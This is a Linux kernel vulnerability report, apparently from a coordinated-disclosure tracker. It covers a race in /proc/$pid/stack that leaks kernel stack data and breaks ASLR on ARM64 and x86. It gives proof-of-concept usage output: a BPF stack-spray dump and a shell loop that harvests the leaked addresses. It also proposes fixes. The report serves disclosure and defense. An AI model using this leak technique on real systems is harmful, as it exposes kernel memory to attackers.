Linux: semi-arbitrary task stack read on ARM64 (and x86) via /proc/$pid/stack 


This issue probably had the most impact on ARM64 kernels before
commit e01e80634ecd ("fork: unconditionally clear stack on fork", first in
v4.17); luckily, that hardening patch was backported all the way to v4.4 (but
not v3.16), so most systems probably have that patch already.

On both ARM64 and x86, /proc/$pid/stack can be used to inspect the symbolized
kernel stack of a task that is concurrently executing on another CPU. (x86 has
a check, but that check is racy, and a comment also documents that it is racy.)
This means that the kernel can potentially attempt to unwind an active task
stack starting from an outdated frame pointer, causing the kernel to interpret
new stack contents (potentially user-supplied data) as a stack frame.

On both x86 and ARM64, the kernel ensures that only stack frames inside the
target's task stack area are dereferenced.
On x86, it is also ensured that only stack frames whose saved instruction
pointer points to some valid text section are printed; on ARM64, stack frames
are printed independent of where the saved instruction pointer points.
The format string element used for printing such stack traces is "%pB", which is
normally used for writing information about kernel crashes to the console; on
kernels with CONFIG_KALLSYMS, it is implemented by sprint_backtrace(), which
falls back to printing raw addresses with "0x%lx" when an address can't be
mapped to a symbol.

On ARM64, the kernel ensures that stack frames are 16-byte-aligned.

This leads to two potential attacks:

1. An attacker can fake a stack frame with a controlled fake instruction pointer
   and observe to which symbol the kernel maps it. This could be used both to
   break kernel text ASLR and (if the attacker doesn't have access to the kernel
   image anyway) to gain more fine-grained information about the layout of
   kernel code.
2. An attacker can fake a stack frame that points to an arbitrary location in
   the task stack (subject to alignment constraints) in order to leak data
   stored at that address into the stack trace returned to userspace.
   (This is more practical on ARM64, but might also work on x86 if you only need
   to leak one byte at a time.)
3. A from my perspective relatively boring DoS: It looks as if building a loop
   out of stackframes whose saved instruction pointers point into scheduler code
   will send the task that's attempting to read /proc/$pid/stack into an endless
   loop.

I have written a PoC for attack 2 and tested it on a Raspberry Pi 3, using a
custom 64-bit build of the Raspberry Pi kernel (based on 4.18.y) with
CONFIG_BPF_SYSCALL manually enabled (because I'm too lazy to search for a more
normal way to spray things on the kernel stack in the right places), built with
gcc 7.2.0. I have attached the PoC as pipe_read.c. The PoC leaks the BPF frame
pointer.

Usage:

In terminal 1:
==============
pi@raspberrypi:~/stack_dump$ gcc -o pipe_read pipe_read.c -pthread && ./pipe_read
==========================
0: (18) r0 = 0xbadbeefbadbeef00
2: (bf) r1 = r10
3: (07) r1 += -24
4: (7b) *(u64 *)(r10 -16) = r10
5: (7b) *(u64 *)(r10 -40) = r1
6: (7b) *(u64 *)(r10 -48) = r0
7: (7b) *(u64 *)(r10 -56) = r1
8: (7b) *(u64 *)(r10 -64) = r0
9: (7b) *(u64 *)(r10 -72) = r1
10: (7b) *(u64 *)(r10 -80) = r0
11: (7b) *(u64 *)(r10 -88) = r1
12: (7b) *(u64 *)(r10 -96) = r0
13: (7b) *(u64 *)(r10 -104) = r1
14: (7b) *(u64 *)(r10 -112) = r0
15: (7b) *(u64 *)(r10 -120) = r1
16: (7b) *(u64 *)(r10 -128) = r0
17: (7b) *(u64 *)(r10 -136) = r1
18: (7b) *(u64 *)(r10 -144) = r0
19: (7b) *(u64 *)(r10 -152) = r1
20: (7b) *(u64 *)(r10 -160) = r0
21: (7b) *(u64 *)(r10 -168) = r1
22: (7b) *(u64 *)(r10 -176) = r0
23: (7b) *(u64 *)(r10 -184) = r1
24: (7b) *(u64 *)(r10 -192) = r0
25: (7b) *(u64 *)(r10 -200) = r1
26: (7b) *(u64 *)(r10 -208) = r0
27: (7b) *(u64 *)(r10 -216) = r1
[...]
1920: (7b) *(u64 *)(r10 -480) = r0
1921: (7b) *(u64 *)(r10 -488) = r1
1922: (7b) *(u64 *)(r10 -496) = r0
1923: (7b) *(u64 *)(r10 -504) = r1
1924: (7b) *(u64 *)(r10 -512) = r0
1925: (b7) r0 = 0
1926: (95) exit
processed 1926 insns (limit 131072), stack depth 512
==========================
==============

In terminal 2:
==============
$ while true; do cat /proc/$(pgrep pipe_read)/stack; done |grep -A1 badbeef
[...]
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffffdf36987000
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffffdf36987000
[...]
==============

In terminal 3 (note that this requires kernel.kptr_restrict==1,
kptr_restrict=0 prints garbage):
==============
# grep _do_fork /proc/vmallocinfo | grep 0xffffff800e5c
0xffffff800e5c8000-0xffffff800e5cd000   20480 _do_fork+0xe8/0x420 pages=4 vmalloc
# 
==============


I'm not sure what the best fix for this is.

32-bit ARM is playing it safe and just refuses to print stack traces for
non-current tasks if CONFIG_SMP is on:
==============
	if (tsk != current) {
#ifdef CONFIG_SMP
		/*
		 * What guarantees do we have here that 'tsk' is not
		 * running on another CPU?  For now, ignore it as we
		 * can't guarantee we won't explode.
		 */
		if (trace->nr_entries < trace->max_entries)
			trace->entries[trace->nr_entries++] = ULONG_MAX;
		return;
#else
==============

With my "annoying security person" hat on: Would it make sense to just gate
proc_pid_stack() on file_ns_capable(m->file, &init_user_ns, CAP_SYS_ADMIN)?
That way, even if the unwind code gets some edgecase wrong, it won't cause the
disclosure of kernel memory to userspace.

If this code should continue to work without CAP_SYS_ADMIN, solving the issue is
probably not so straightforward...

One approach would be to fire an IPI to request that the target task dumps its
own stack.

Another approach might be to, between every time a pointer is read from the
target's stack and it is dereferenced, check somehow whether the target task has
been scheduled in the maintime. Perhaps by checking p->nvcsw, p->nivcsw and
p->on_cpu, if that works without races? The reason why I'd like to have more
than just one check at the end for this approach are (non-speculative) side
channels.


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.


Found by: jannh